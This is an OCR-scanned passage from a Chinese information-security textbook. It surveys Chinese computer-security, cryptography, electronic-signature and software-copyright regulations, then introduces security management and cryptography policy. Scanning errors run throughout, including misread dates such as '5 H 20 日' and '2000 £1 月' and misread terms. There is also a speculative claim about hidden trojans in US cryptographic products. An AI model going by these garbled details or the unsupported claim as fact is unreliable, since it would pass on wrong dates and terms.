公安 机 关 发 现 影响 计算 机 信息 系统 安全 的 隐患 时 ， 应 当 及 时 通知 使 用 单位 采用 保护 
措施 。 在 紧急 情况 下 ， 可 以 就 涉及 计算 机 信息 系统 安全 的 特定 事项 发 布 专项 通令 。 

另外 ， 该 条 例 还 系统 设置 了 以 下 安全 保护 的 制度 : 

(1) 计算 机 信息 系统 实行 安全 等 级 保护 ; 

(2) 计算 机 机 房 应 当 符合 国家 标准 和 国家 有 关 规 定 

G) 进行 国际 联网 的 计算 机 信息 系统 ， 由 计算 机 信息 系统 的 使 用 单位 报 省 级 以 上 人 
民政 府 公安 机 关 备 案 ; 

(4) 运输 、 携 带 、 邮 寄 计 算 机 信息 媒体 进出 境 的 ， 应 当 如 实 向 海关 申报 ; 

(5) 计算 机 信息 系统 的 使 用 单位 应 当 建 立 健全 安全 管理 制度 ， 负 责 本 单位 计算 机 信 
息 系 统 安全 保护 工作 ; 

(6) 计算 机 信息 系统 安全 专用 产品 的 销售 实行 许可 证 制度 ; 

(7) 对 计算 机 信息 系统 中 发 生 的 案件 ， 有 关 使 用 单位 应 当 在 24 小 时 内 向 当地 县 级 
以 上 人 民政 府 公安 机 关 报告 ; 
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(8) 故意 输入 计算 机 病毒 以 及 其 他 有 害 数据 危害 计算 机 信息 系统 安全 的 ， 或 者 未 经 
许可 出 售 计算 机 信息 系统 安全 专用 产品 的 ， 由 公安 机 关 处 以 警告 或 者 相应 的 罚款 等 。 

这 里 的 计算 机 病毒 是 指 ， 编 制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 毁坏 
数据 ， 影 响 计算 机 使 用 ， 并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 

这 里 的 计算 机 信息 系统 安全 专用 产品 是 指 ， 用 于 保护 计算 机 信息 系统 安全 的 专用 硬 
件 和 软件 产品 。 
1.2.2.3 其 他 法 律 法 规 

1. 互联 网 络 安全 管理 相关 法 律 法 规 

1997 年 5 H 20 日 国务 院 令 第 218 号 发 布 了 修订 后 的 《中 华人 民 共 和 国 计 算 机 信息 
网 络 国际 联网 管理 暂行 规定 》。 该 规定 明确 了 互联 网 的 宏观 管理 主体 和 政策 、 域名 管理 机 
构 、 现 有 互联 网 的 管理 单位 、 新 建 互联 网 的 审批 程序 、 互 联网 的 经 营 及 使 用 应 履行 的 手 
续 和 程序 、 以 及 相关 违法 责任 ， 同 时 还 对 国际 出 入 口 信道 进行 了 明确 规定 。 

1998 年 3 月 6 日 国务 院 信息 办 发 布 了 《中 华人 民 共 和 国 计 算 机 信息 网 络 国 际 联网 
管理 暂行 规定 实施 办 法 》 对 《中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂行 规定 》 
作出 了 详细 的 程序 性 规定 。 

2000 £1 月 25 日 ， 国 家 保密 局 颁布 了 《计算 机 信息 系统 国际 联网 保密 管理 规定 》。 
计算 机 信息 系统 国际 联网 ， 是 指 中 华人 民 共 和 国境 内 的 计算 机 信息 系统 为 实现 信息 的 国 
际 交 流 ， 同 外 国 的 计算 机 信息 网 络 相连 接 。 计 算 机 信息 系统 国际 联网 的 保密 管理 ， 实 行 
控制 源头 、 归 口 管理 、 分 级 负责 、 突 出 重点 、 有 利 发 展 的 原则 。 

本 管理 规定 主要 做 出 了 以 下 规定 : 涉及 国家 秘密 的 计算 机 信息 系统 不 得 直接 或 间接 
地 与 国际 互联 网 或 其 他 公共 信息 网 络 相 连接 ， 必 须 对 其 实行 物理 隔离 ; 涉及 国家 秘密 的 
信息 包括 在 对 外 交往 与 合作 中 经 审查 、 批 准 与 境外 特定 对 象 合法 交换 的 国家 秘密 信息 不 
得 在 国际 联网 的 计算 机 信息 系统 中 存储 、 处 理 、 传 递 。 

2. 商用 密码 和 信息 安全 产品 的 相关 法 律 法 规 

我 国有 明确 的 法 规 规章 对 信息 安全 产品 的 研发 、 生产 和 销售 进行 规范 。1997 年 6 H, 
公安 部 颁布 了 《计算 机 信息 系统 安全 专用 产品 检测 和 销售 许可 证 管理 办 法 》 以 加 强 对 用 
于 保护 计算 机 信息 系统 安全 的 专用 硬件 和 软件 产品 的 管理 ， 保 证 安全 专用 产品 的 安全 功 
能 。 防 病毒 卡 、 防 病毒 软件 、 清 病毒 软件 等 防止 计算 机 病毒 传播 保护 计算 机 信息 系统 安 
全 的 软 、 硬 件 ， 也 都 属于 计算 机 信息 系统 安全 专用 产品 。 

安全 专用 产品 的 生产 者 应 当 向 经 公安 部 计算 机 管理 监察 部 门 批准 的 检测 机 构 申 请 
安全 功能 检测 。 在 送 交 安 全 专用 产品 检测 时 ， 要 向 检测 机 构 提 交 产 品 样品 、 功 能 及 性 能 
的 中 文 说 明 、 证 明 材 料 等 材料 , 用 到 密码 技术 的 还 需要 有 国家 密码 管理 部 门 的 审批 文件 。 

中 华人 民 共 和 国境 内 的 安全 专用 产品 进入 市 场 销售 , 实行 销售 许可 证 制度 。 获得 《 安 
全 专用 产品 检测 结果 报告 》 之 后 ， 安 全 专用 产品 的 生产 者 方 可 申 领 《 计 算 机 信息 系统 安 
全 专用 产品 销售 许可 证 》， 防治 计算 机 病毒 的 安全 专用 产品 还 要 提交 公安 机 关 颁 发 的 计 
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算 机 病毒 防治 研究 的 备案 证 明 ， 获 得 该 许可 证 的 产品 方 可 进入 市 场 销售 。 

我 国 对 于 商用 密码 的 管理 非常 严格 ，1999 年 10 月 国务 院 发 布 了 《商用 密码 管理 条 
例 》 管 理 对 象 是 不 涉及 国家 秘密 内 容 的 信息 进行 加 密 保 护 或 者 安全 认证 所 使 用 的 密码 技 
术 和 密码 产品 ， 而 商用 密码 技术 本 身 则 属于 国家 秘密 。 国 家 对 商用 密码 产品 的 科研 、 生 
产 、 销 售 和 使 用 实行 专 控 管理 。 商 用 密码 的 科研 、 生 产 由 国家 密码 管理 机 构 指定 的 单位 
承担 ， 商 用 密码 产品 的 销售 则 必须 经 国家 密码 管理 机 构 许 可 ， 拥 有 《商用 密码 产品 销售 
许可 证 》 才 可 进行 。 而 从 事 商用 密码 产品 的 科研 、 生 产 和 销售 以 及 使 用 商用 密码 产品 的 
单位 和 人 员 ， 必 须 对 所 接触 和 掌握 的 商用 密码 技术 承担 保密 义务 。 

国务 院 制定 并 颁布 《商用 密码 管理 条 例 》， 以 国务 院 第 273 号 令 发 布施 行 ， 这 是 我 
们 党 和 国家 密码 工作 历史 上 的 一 件 具 有 里 程 碑 意义 的 大 事 。 它 标志 着 我 国 的 密码 工作 开 
始 走向 社会 ， 密 码 应 用 的 范围 进一步 拓宽 ， 同 时 也 标志 着 我 国 密码 工作 的 管理 ， 从 过 去 
的 政策 管理 开始 步 入 法 制 轨 道 。 

3. 计算 机 病毒 防治 相关 管理 办 法 

公安 部 第 151 号 令 于 2000 年 4 月 26 日 颁布 了 《计算 机 病毒 防治 管理 办 法 》。 所 称 
的 计算 机 病毒 ， 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ， 影 
响 计 算 机 使 用 , 并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 所 称 的 计算 机 病毒 疫情 ， 
是 指 某 种 计算 机 病毒 爆发 、 流 行 的 时 间 、 范 围 、 破 坏 特点 、 破 坏 后 果 等 情况 的 报告 或 者 
预报 。 

《计算 机 病毒 防治 管理 办 法 》 明 确 由 公安 部 公共 信息 网 络 安全 监察 部 门 主 管 全 国 的 
计算 机 病毒 防治 管理 工作 ， 地 方 各 级 公安 机 关 有 具 体 负责 本 行政 区 域内 的 计算 机 病毒 防治 
管理 工作 。 

4. 电子 签名 法 

2005 年 4 H, 《中 华人 民 共 和 国电 子 签名 法 》 正 式 施行 《电子 签名 法 》 主 要 规定 了 
关于 数据 电文 、 电 子 签名 与 认证 及 相关 的 法 律 责任 。 

所 谓 电子 签名 ， 是 指数 据 电文 中 以 电子 形式 所 含 、 所 附 用 于 识别 签名 人 身份 并 表明 
签名 人 认可 其 中 内 容 的 数据 。 数 据 电文 ， 是 指 以 电子 、 光 学 、 磁 或 者 类 似 手段 生成 、 发 
送 、 接 收 或 者 储存 的 信息 。 我 国 的 《电子 签名 法 》 规 范 了 法 律 认可 的 数据 电文 、 数 据 电 
文 的 书面 形式 和 原件 形式 的 概念 , 同时 解释 了 数据 电文 的 文件 保存 以 及 作为 证 据 的 条 件 ， 
明确 了 对 数据 电文 的 发 送 和 收 到 的 概念 。 

5. 电子 政务 法 

电子 政府 是 指 通过 整合 运用 包括 互联 网 等 IT 技术 ,实现 迅速 、 透 明 、 方便 和 高 效 的 
处 理 行政 机 关 之 间 、 行 政 机 关 与 公民 之 间 、 以 及 行政 机 关 与 企业 之 间 的 全 部 业务 的 电子 
化 的 政府 。 电 子 政府 的 目的 是 政府 利用 I 技术 实现 向 全 社会 提供 信息 和 服务 的 电子 化 ， 
是 全 社会 得 到 更 充分 、 快 捷 、 高 效 的 信息 和 服务 。 

狭义 地 讲 ， 电 子 政务 法 是 国家 颁布 实施 的 命名 为 《电子 政务 法 》 的 单行 法 ， 现 已 制 
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定 《 电 子 政务 法 》 单 行 法 的 主要 国家 有 美国 、 韩 国 等 。 广 义 地 说 ， 电 子 政务 法 是 为 了 实 
现 电 子 政府 的 业务 内 容 ， 促 进行 政 业 务 等 的 电子 化 的 各 种 法 律 规范 的 总 称 。 

我 国电 子 政务 发 展 起 步 较 晚 ， 其 相应 的 立法 还 处 于 探索 发 展 阶段 ， 已 经 先后 出 台 了 
一 些 与 规范 电子 政务 发 展 有 关 的 法 律 法 规 。1995 年 颁布 实施 的 《政务 信息 工作 暂行 办 
法 》 初步 将 政务 法 的 重要 性 引入 公众 面前 。2008 年 5 月 1 日 正式 施行 的 《中 华人 民 共 
和 国政 府 信息 公 开 条 例 》 进 一 步 规范 了 政府 信息 公开 的 范围 。 目 前 ， 我 国电 子 政务 立法 
的 工作 虽然 已 经 取得 了 很 大 的 进展 ， 但 仍然 存在 着 一 定 问题 ， 主 要 表现 在 立法 不 统一 规 
范 ， 结 构 不 清晰 及 立法 层次 不 高 等 。 


1.2.3 数字 信息 与 知识 产权 


知识 产权 包括 著作 权 〈 也 称 版 权 )、 工 业 产权 〈 包 括 专利 权 和 商标 权 )、 技 术 秘密 和 
商业 秘密 。 

我 国 1990 年 制定 ，2001 年 修正 的 《中 华人 民 共 和 国 著作 权 法 》 在 第 三 条 中 明确 将 
计算 机 软件 作为 客体 加 以 著作 权 法 保护 。 

目前 我 国有 关 的 知识 产权 法 律 中 与 计算 机 软件 相关 的 主要 有 《计算 机 软件 保护 条 
例 》( 实 体 性 规定 ) 和 《计算 机 软件 登记 办 法 》( 程 序 性 规定 )。 
1.2.3.1 涉及 计算 机 网 络 的 著作 权 纠 纷 

网 络 著 作 权 侵权 有 多 种 类 型 ， 如 : 侵害 发 表 权 等 著作 人 身 权 ; 向 公众 传播 作品 侵害 
使 用 权 ; 侵害 获得 报酬 权 、 侵 害 录音 录像 制作 者 、 表 演 者 、 广 播 电视 组 织 等 邻接 权 剂 窃 、 
或 者 认定 故意 去 除 或 者 改变 著作 权 管理 信息 而 导致 侵权 后 果 的 行为 构成 侵权 ;抄袭 他 人 
作品 等 。 

网 络 著作 权 侵 权 纠 纷 案件 由 侵权 行为 地 或 者 被 告 住所 地 人 民法 院 管辖 。 侵 权 行 为 地 
包括 实施 被 诉 侵权 行为 的 网 络 服务 器 、 计 算 机 终端 等 设备 所 在 地 。 对 难以 确定 侵权 行为 
地 和 被 告 住所 地 的 , 原告 发 现 侵权 内 容 的 计算 机 终端 等 设备 所 在 地 可 以 视 为 侵权 行为 地 。 

2002 年 ， 国 务 院 《计算 机 软件 保护 条 例 》 正 式 施 行 ， 同 时 1991 年 6 月 4 日 国务 院 
发 布 的 《计算 机 软件 保护 条 例 》 同 时 废止。 

该 条 例 所 称 软件 ， 是 指 计算 机 程序 及 其 有 关 文 档 。 同 一 计算 机 程序 的 源 程序 和 目标 
程序 为 同一 作品 。 

受 本 条 例 保护 的 软件 必须 由 开发 者 独立 开发 ， 并 已 固定 在 某 种 有 形 物体 上 。 对 软件 
著作 权 的 保护 不 延 及 开发 软件 所 用 的 思想 、 处 理 过 程 、 操 作 方 法 或 者 数学 概念 等 。 

计算 机 软件 受 保护 的 条 件 主要 有 以 下 三 个 : 原创 性 ， 软 件 应 该 是 开发 者 独立 设计 、 
独立 编制 的 编码 组 合 ， 可 感知 性 ， 受 保护 的 软件 需 固定 在 某 种 有 形 物体 上 ， 只 有 当 这 种 
程序 设计 通过 客观 手段 表达 出 来 并 为 人 所 知悉 时 才能 受 法 律 保护 ;可 再 现 性 ， 亦 称 可 复 
制 性 ， 即 把 软件 转载 有 形 物 体 上 的 可 能 

计算 机 软件 著作 权 人 享有 人 身 权 和 财产 权 。 人 身 权 包括 发 表 权 、 署 名 权 和 修改 权 等 ， 
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发 表 权 即 决定 软件 是 否 公之于众 的 权利 ， 署 名 权 是 开发 者 身份 权 ， 表 明 开 发 者 身分 的 权 
利 及 在 其 软件 上 署名 的 权利 ， 修 改 权 是 作者 修改 或 授权 他 人 修改 其 作品 的 权利 。 财 产权 
包括 复制 权 、 发 行 权 、 出 租 权 、 信 息 网 络 传播 权 、 翻 译 权 及 其 他 权利 。 

2002 年 ， 为 贯彻 《计算 机 软件 保护 条 例 》， 国 家 版 权 局 发 布 了 《计算 机 软件 著作 权 
登记 办 法 》。《 计 算 机 软件 著作 权 登 记 办 法 》 规 定 了 申请 软件 著作 权 登 记 应 提交 的 材料 、 
主要 证 明文 件 的 内 容 和 格式 要 求 。 

受 著作 权 法 保护 的 作品 ， 除 了 计算 机 软件 之 外 ， 还 有 著作 权 法 规定 的 各 类 作品 的 数 
字 化 形式 。 在 网 络 环境 下 无 法 归于 著作 权 法 列举 的 作品 范围 ， 但 在 文学 、 艺 术 和 科学 领 
域内 具有 独创 性 并 能 以 某 种 有 形 形 式 复制 的 其 他 智力 创作 成 果 ， 也 是 受 法 律 保护 的 。 
1.2.3.2 ”信息 网 络 传播 权 保护 

2006 年 5 H 10 日 国务 院 第 468 号 令 通过 了 《信息 网 络 传播 权 保护 条 例 》， 并 于 同年 
开始 实行 , 并 于 2013 年 1 月 16 日 通过 了 《国务 院 关 于 修改 〈 信 息 网 络 传播 权 保 护 条 例 》 
的 决定 》。 本 条 例 是 根据 《中 华人 民 共 和 国 著作 权 法 》 制 定 的 ， 旨 在 保护 著作 权 人 、 表 演 
者 、 录 音 录像 制作 者 的 信息 网 络 传播 权 ， 鼓 励 有 益 于 社会 主义 精神 文明 、 物 质 文明 建设 
的 作品 的 创作 和 传播 。 

条 例 规定 ， 权 利 人 享有 的 信息 网 络 传播 权 受 著作 权 法 和 本 条 例 保 护 。 除 法 律 、 行 政 
法 规 另 有 规定 的 外 ， 任 何 组 织 或 者 个 人 将 他 人 的 作品 、 表 演 、 录 音 录像 制品 通过 信息 网 
络 向 公众 提供 ， 应 当 取得 权利 人 许可 ， 并 支付 报酬 。 
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1.3.1 信息 安全 管理 


信息 安全 管理 是 随 着 信息 和 信息 安全 的 发 展 而 发 展 的。 在 当今 信息 社会 中 ， 信 息 已 
成 为 人 类 的 重要 资产 ， 而 由 于 计算 机 及 网 络 技术 的 迅猛 发 展 带 来 的 信息 安全 问题 正 变 得 
日 益 突出 ， 使 得 组 织 在 业务 运作 过 程 中 面临 巨大 的 信息 资产 泄露 风险 ， 信 息 基础 设施 也 
面临 着 大 量 存在 于 组 织 内 外 的 各 种 威胁 。 因 此 ， 对 信息 系统 需要 加 以 严格 管理 和 妥善 维 
护 ， 信 息 安全 管理 也 随 之 产生 。 

信息 安全 是 一 个 广泛 而 抽象 的 概念 ， 不 同 的 领域 不 同 的 方向 对 其 概念 的 阐述 都 会 有 
所 不 同 。 对 建立 在 现代 计算 机 及 网 络 的 基础 之 上 的 信息 系统 ， 比 较 明 确 的 定义 是 : 保护 
信息 系统 的 硬件 、 软 件 及 相关 数据 ， 使 之 不 因为 偶然 或 恶意 的 侵犯 而 遭受 破坏 、 更 改 和 
泄露 ;保证 信息 系统 中 信息 的 机 密 性 〈Confidentiality)、 完 整 性 CIntegrity) 和 可 用 性 
CAvailability)。 从 更 为 广义 的 概念 来 看 ， 当 前 信息 安全 的 主要 内 容 或 目标 可 能 还 需要 包 
括 不 可 和 否认 性 (Non-Repudiability)、 可 控 性 〈Controllability)、 真 实 性 (Authenticity) 和 
有 效 性 〈Utility) 等 。 为 此 ， 需 要 通过 采用 相应 的 计算 机 软 硬 件 技术 、 网 络 技术 、 密 码 
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技术 等 安全 技术 和 各 种 组 织 管理 措施 , 来 保护 信息 在 其 生命 周期 内 的 产生 、 传 输 、 交 换 、 
处 理 和 存储 的 各 个 环节 中 ， 其 机 密 性 、 完 整 性 和 可 用 性 等 不 被 破坏 。 

信息 安全 的 构建 是 一 个 系统 工程 ， 需 要 对 信息 系统 的 各 个 环节 进行 统一 的 综合 考 
虑 、 规 划 和 构架 ， 并 随时 兼顾 系统 内 外 的 变化 情况 。 因 此 ， 信 息 安 全 管理 的 引入 ， 对 于 
保护 信息 资产 、 降 低 信息 系统 安全 风险 、 指 导 信息 安全 体系 建设 具有 重要 的 意义 和 作用 ， 
是 信息 安全 保障 体系 建设 的 重要 组 成 部 分 。 信 息 安 全 管理 则 可 定义 为 通过 维护 信息 的 机 
密 性 、 完 整 性 和 可 用 性 等 来 管理 和 保护 信息 资产 的 一 项 体制 ， 是 对 信息 安全 保障 进行 指 
导 、 规 范 和 管理 的 一 系列 活动 和 过 程 。 

信息 安全 管理 是 保护 国家 、 组 织 、 个 人 等 各 个 层面 上 信息 安全 的 重要 基础 。 只 有 以 
有 效 的 信息 安全 管理 体系 为 基础 ， 完 善信 息 安 全 的 管理 结构 ， 综 合 应 用 信息 安全 管理 策 
略 和 信息 安全 技术 产品 ， 才 有 可 能 建立 起 一 个 真正 意义 上 的 信息 安全 防护 体系 。 信 息 安 
全 管理 应 当 涉及 信息 安全 的 各 个 方面 ， 包 括 制定 信息 安全 策略 、 风 险 评估 、 控 制 目标 与 
方式 选择 、 制 定 规范 的 操作 流程 、 对 人 员 进 行 安全 培训 等 一 系列 工作 。 

信息 安全 管理 体系 是 组 织 在 整体 或 特定 范围 内 建立 的 信息 安全 方针 和 目标 ， 以 及 完 
善 这 些 目标 所 采用 的 方法 和 手段 所 构成 的 体系 ; 信息 安全 管理 体系 是 信息 安全 管理 活动 
的 直接 结果 ， 可 表示 为 策略 、 原 则 、 目 标 、 方 法 、 程 序 和 资源 等 总 的 集合 。 以 下 从 几 个 
具体 的 方面 做 进一步 的 描述 。 
1.3.1.1 ”密码 管理 

为 了 保护 计算 机 和 信息 系统 中 的 敏感 信息 ， 有 选择 地 采取 技术 上 的 和 相关 程序 上 的 
安全 防护 措施 是 各 组 织 在 信息 安全 管理 体系 中 的 迫切 需求 。 使 用 基于 密码 机 制 的 安全 系 
统 来 保护 敏感 信息 是 行 之 有 效 的 方法 。 被 保护 信息 的 机 密 性 和 完整 性 等 安全 特性 由 相应 
密码 模块 的 功能 来 实现 。 因 此 ， 将 密码 模块 置 于 信息 安全 系统 中 以 及 相应 的 密码 管理 就 
显得 尤为 重要 。 

在 当今 网 络 化 、 信 息 化 的 时 代 ， 密 码 技术 的 运用 已 经 深入 到 各 行 各 业 以 及 人 们 的 日 
常生 活 的 各 个 方面 。 小 到 智能 电话 卡 、 银 行 信用 卡 ， 大 到 电子 商务 、 电 子 政务 ， 从 个 人 
到 公司 ， 从 组 织 到 政府 ， 无 一 例外 地 越 来 越 依赖 密码 技术 所 提供 的 保护 。 随 着 信息 和 信 
息 技术 的 发 展 ， 电 子 数据 交换 逐步 成 为 人 们 交换 信息 的 主要 形式 。 密 码 在 信息 安全 领域 
中 的 应 用 将 会 不 断 拓宽 ， 信 息 安全 对 密码 的 依赖 也 会 越 来 越 大 。 密 码 从 最 原始 的 利用 一 
种 变换 来 保护 信息 的 秘密 性 ， 发 展 到 适应 当今 信息 技术 的 现代 密码 学 ， 不 仅 用 于 解决 信 
息 保 护 的 秘密 性 ， 而 且 也 用 于 解决 信息 的 完整 性 、 可 用 性 、 可 控 性 和 不 可 抵赖 性 等 。 基 
此 ， 可 以 说 密码 技术 是 保护 信息 安全 的 最 有 效 手段 ， 也 是 保护 信息 安全 的 最 关键 技术 。 

密码 是 一 门 科学 ， 作 为 运用 于 军事 和 政治 斗争 的 一 种 技术 ， 有 着 悠久 的 历史 。 密 码 
在 古代 就 被 用 于 传递 秘密 消息 。 在 近代 和 现代 战争 中 ， 传 递 情 报 和 指挥 战争 均 离 不 开 密 
码 ， 外 交 斗 争 中 也 离 不 开 密码 。 密 码 一 般 用 于 信息 通信 传输 过 程 中 的 保密 和 存储 中 的 保 
密 。 随 着 计算 机 和 信息 技术 的 发 展 ， 密 码 技术 的 发 展 也 非常 迅速 ， 应 用 领域 不 断 扩 展 。 
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密码 除了 用 于 信息 加 密 外 ， 也 用 于 数据 信息 签名 和 安全 认证 。 这 样 ， 密 码 的 应 用 也 不 再 
只 局 限于 为 军事 、 外 交 斗 争 服务 ， 它 也 广泛 应 用 在 社会 和 经 济 活动 中 。 当 今世 界 已 经 出 
现 了 密码 应 用 的 社会 化 和 个 人 化 趋势 。 例 如 : 可 以 将 密码 技术 应 用 在 电子 商务 中 ， 对 网 
上 交易 双方 的 身份 和 商业 信用 进行 识别 ， 防 止 网 上 电子 商务 中 的 “黑客 "和 欺诈 行为 ; 应 
用 于 增值 税 发 票 中 ， 可 以 防伪 、 防 篡改 ， 杜 绝 了 各 种 利用 增值 税 发 票 偷 、 漏 、 逃 、 骗 国 
家 税收 的 行为 ， 并 大 大 方便 了 税务 稽查 ; 应 用 于 银行 支票 鉴别 中 ， 可 以 大 大 降低 利用 假 
支票 进行 金融 诈骗 的 金融 犯罪 行为 ;应 用 于 个 人 移动 通信 中 ， 大 大 增强 了 通信 信息 的 保 
密 性 等 等 。 

过 去 密码 的 研制 、 生 产 、 使 用 和 管理 都 是 在 封闭 的 环境 下 进行 的 。1970 年 代 以 来 ， 
随 着 计算 机 、 通 信和 信息 技术 的 发 展 ， 密 码 领域 也 发 生 了 新 的 变化 。 密 码 应 用 范围 日 益 
扩大 ， 社 会 对 密码 的 需求 更 加 迫切， 密码 研究 领域 不 断 拓宽 ， 密 码 研究 也 从 专业 机 构 走 
向 社会 和 民间 ， 密 码 技术 得 到 了 空前 的 发 展 。 

基于 密码 的 安全 系统 的 设计 和 实现 涉及 密码 模块 的 设计 和 实现 。 所 谓 密码 模块 就 是 
一 个 硬件 、 软 件 、 固 件 或 其 他 相关 组 件 的 组 合 ， 用 以 实现 密码 的 逻辑 和 处 理 。 密 码 模块 
是 提供 密码 服务 〈 如 加 解密 、 签 名 、 鉴 别 等 ) 的 系统 或 应 用 的 一 部 分 ， 也 是 整个 安全 系 
统 的 核心 。 

然而 ， 密 码 学 和 密码 机 制 不 仅仅 是 一 个 与 各 个 国家 的 外 交 和 军事 机 构 有 关 的 问题 ， 
而 且 对 于 公民 或 个 人 与 代表 社会 的 国家 之 间 的 长 久 利益 冲突 有 深远 的 影响 。 一 方面 ， 公 
民 或 公司 通过 有 效 的 密码 体制 来 保护 公民 的 私人 空间 或 公司 商业 利益 ， 这 是 他 们 无 可 辩 
驶 的 权利 。 另 一 方面 ， 国 家 又 有 法 律 所 赋予 的 责任 ， 必 须 保护 国家 的 内 外 安全 ， 而 这 又 
需要 获取 加 密 的 消息 来 获得 情报 。 因 此 ， 必 然 就 会 存在 国家 利益 和 个 人 利益 的 矛盾 与 
冲突 。 

关于 密码 技术 涉及 的 国家 利益 问题 ， 各 个 国家 的 政策 不 尽 相同 。 由 于 密码 技术 作为 
商品 的 特殊 性 ， 在 美国 ， 政 府 凭借 其 信息 技术 的 优势 ， 通 过 出 口 信息 安全 和 密码 产品 来 
达到 控制 、 获 取 别 国信 息 的 目的 ， 并 且 在 不 同 的 时 期 适时 的 调整 其 密码 管理 政策 。 例 如 ， 
美国 政府 最 初 限制 40 位 密 钥 长 度 以 上 的 密码 产品 出 口 ,继而 同意 具有 密 钥 托管 或 密 钥 恢 
复 功能 的 强 密码 出 口 ， 这 些 政策 都 是 美国 政府 可 以 控制 和 解读 的 ， 更 不 用 说 在 密码 芯片 
和 操作 系统 中 还 会 隐藏 着 人 们 尚未 发 现 的 危险 性 更 大 的 一 些 “ 限 门 ” 和 “木马 ”。 一 旦 国 
家 利益 发 生 冲 突 ， 那 些 隐藏 的 木马 可 能 会 在 某 些 秘密 指令 下 激活 起 来 ， 破 坏 或 自 改 系统 
中 的 重要 信息 ， 或 把 这 些 重要 信息 通过 网 络 秘密 的 发 送出 去 。 对 此 ， 我 们 必须 有 清醒 的 
认识 。 

加 强 对 商用 密码 管理 是 目前 国际 上 通行 的 做 法 。 例 如 美国 政府 对 密码 出 口 的 严格 管 
制 ， 其 目的 之 一 便 是 控制 密码 技术 外 流 ， 以 免 为 执法 机 关 和 情报 机 构 “ 非 正常 获取 ” 信 
息 增 加 困难 ;其 二 是 监控 密码 市 场 的 发 展 情况 ; 最 后 则 是 出 于 外 交 政 策 的 需要 。 

我 国 的 商用 密码 管理 原则 ， 在 中 共 中 央 办 公 厅 1996 年 27 号 文中 ， 明 确 了 我 国 发 展 
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和 管理 商用 密码 实行 “统一 领导 ， 集 中 管理 ， 定 点 研制 ， 专 控 经 营 ， 满 足 使 用 ”的 20 
字 方 针 。 

商用 密码 的 应 用 领域 十 分 广泛 ， 主 要 用 于 对 不 涉及 国家 秘密 内 容 但 又 具有 敏感 性 的 
内 部 信息 、 行 政事 务 信息 、 经 济 信息 等 进行 加 密 保 护 。 比 如 : 商用 密码 可 用 于 企业 内 部 
的 各 类 敏感 信息 的 传输 加 密 、 存 储 加 密 ， 防 止 非法 第 三 方 获取 信息 内 容 ; 也 可 用 于 各 种 
安全 认证 、 网 上 银行 、 数 字 签 名 等 。 

根据 1999 年 10 月 7 日 国务 院 发 布 实施 的 《商用 密码 管理 条 例 》 第 一 章 第 二 条 规定 : 
“本 条 例 所 称 商 用 密码 , 是 指 对 不 涉及 国家 秘密 内 容 的 信息 进行 加 密 保护 或 者 安全 认证 所 
使 用 的 密码 技术 和 密码 产品 ”。 

如 何 来 理解 《条 例 》 中 对 商用 密码 的 定义 呢 ? 第 一 ， 它 明确 了 商用 密码 是 用 于 “不 
涉及 国家 秘密 内 容 的 信息 ”领域 ， 即 非 涉 密 信息 领域 。 商 用 密码 所 涉及 的 范围 很 广 ， 凡 
是 不 涉及 国家 秘密 内 容 的 信息 ,又 需要 用 密码 加 以 保护 的 , 均 可 以 使 用 商用 密码 。 第 二 ， 
它 指明 了 商用 密码 的 作用 ， 是 实现 非 涉 密 信 息 的 加 密 保护 和 安全 认证 等 具体 应 用 。 加 密 
是 密码 的 传统 应 用 。 采 用 密码 技术 实现 信息 的 安全 认证 ， 是 现代 密码 的 主要 应 用 之 一 。 
第 三 ， 定 义 将 商用 密码 归结 为 商用 密码 技术 和 商用 密码 产品 ， 也 就 是 说 ， 商 用 密码 是 商 
用 密码 技术 和 商用 密码 产品 的 总 称 。 而 商用 密码 技术 ， 则 是 指 能 够 实现 商用 密码 算法 的 
加 密 、 解 密 和 认证 等 功能 的 技术 (包括 密码 算法 编程 技术 和 密码 算法 芯片 、 加 密 卡 等 的 
实现 技术 )。 商 用 密码 技术 是 商用 密码 的 核心 ,国家 将 商用 密码 技术 列 入 国家 秘密 , 任何 
单位 和 个 人 都 有 责任 和 义务 保护 商用 密码 技术 的 秘密 。 

由 原 国 家 密码 管理 委员 会 办 公 室 变更 而 来 的 国家 密码 管理 局 ， 履 行 对 全 国 的 密码 管 
理 职 能 ， 自 成 立 以 来 ， 先 后 发 布 了 《电子 认证 服务 密码 管理 办 法 》 及 相应 的 《证 书 认证 
系统 密码 及 其 相关 安全 技术 规范 》。 并 于 2006 年 1 月 1 日 起 ， 施 行 《 商 用 密码 科研 管理 
规定 》、《 商 用 密码 产品 生产 管理 规定 》 和 《商用 密码 产品 销售 管理 规定 》。 

国家 密码 管理 局 于 2006 年 1 月 6 日 发 布 公告 ， 公 布 了 “无 线 局 域 网 产品 须 使 用 的 
系列 密码 算法 ”， 包 括 : 

o 对 称 密码 算法 SMS4; 

。 签名 算法 : ECDSA; 

。 密 钥 协商 算法 : ECDH; 

o 杂凑 算法 : SHA-256; 

。 随机 数 生成 算法 : 自行 选择 。 

HH, ECDSA 和 ECDH 密码 算法 须 采 用 国家 密码 管理 局 指定 的 椭圆 曲线 和 参数 。 

这 是 国内 官方 公布 的 第 一 个 商用 密码 算法 系列 。 经 过 曲折 和 艰难 的 历程 ， 我 国 商用 
密码 终于 掀 开 了 神秘 的 面纱 。 该 系列 算法 的 公布 是 我 国 密码 管理 的 突破 性 进展 ， 对 我 国 
信息 化 安全 和 信息 安全 产业 的 健康 发 展 必 将 起 到 关键 性 作用 ， 对 电子 商务 的 发 展 也 将 起 
到 推动 作用 ， 在 我 国信 息 化 发 展 史上 ， 具 有 里 程 碑 的 性 质 。 
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虽然 公布 的 算法 仅 是 指定 给 无 线 局 域 网 产品 使 用 的 算法 ， 但 是 它 的 公布 在 某 种 意义 
上 代表 了 商用 密码 发 展 方向 ， 将 开辟 我 国 密码 管理 的 新 航道 。 在 其 后 的 发 展 中 ， 会 有 适 
合 于 更 广泛 范围 应 用 的 、 种 类 更 加 丰富 的 密码 算法 公布 于 众 。 

有 了 公开 的 密码 算法 ， 密 码 和 信息 安全 产品 的 研制 者 将 有 统一 的 标准 和 规范 可 以 依 
循 ， 可 以 将 更 多 的 精力 放 在 产品 技术 和 服务 质量 的 竞争 上 ; 密码 和 信息 安全 产品 的 使 用 
